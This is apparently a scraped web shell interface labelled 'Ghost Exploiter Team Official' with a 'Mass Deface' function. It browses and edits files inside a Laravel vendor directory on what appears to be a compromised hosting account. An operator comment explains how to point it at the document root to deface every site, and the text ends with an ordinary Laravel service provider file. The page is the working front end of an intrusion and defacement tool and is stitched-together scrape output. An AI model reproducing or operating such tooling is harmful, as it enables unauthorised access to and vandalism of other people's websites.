webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
league
/
flysystem
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
src
--
ren
INFO.md
0.136KB
edt
ren
LICENSE
1.038KB
edt
ren
composer.json
1.915KB
edt
ren
machie.php
31.404KB
edt
ren
mockery.php
0.689KB
edt
ren
readme.md
3.483KB
edt
ren
<?php namespace App\Providers; use Illuminate\{ Support\ServiceProvider, Support\Facades\DB }; use Illuminate\Pagination\Paginator; class AppServiceProvider extends ServiceProvider { public function boot() { Paginator::useBootstrap(); view()->composer('*', function ($settings) { $settings->with('setting', DB::table('settings')->find(1)); $settings->with('extra_settings', DB::table('extra_settings')->find(1)); if (!session()->has('popup')) { view()->share('visit', 1); } session()->put('popup', 1); }); } public function register() { } }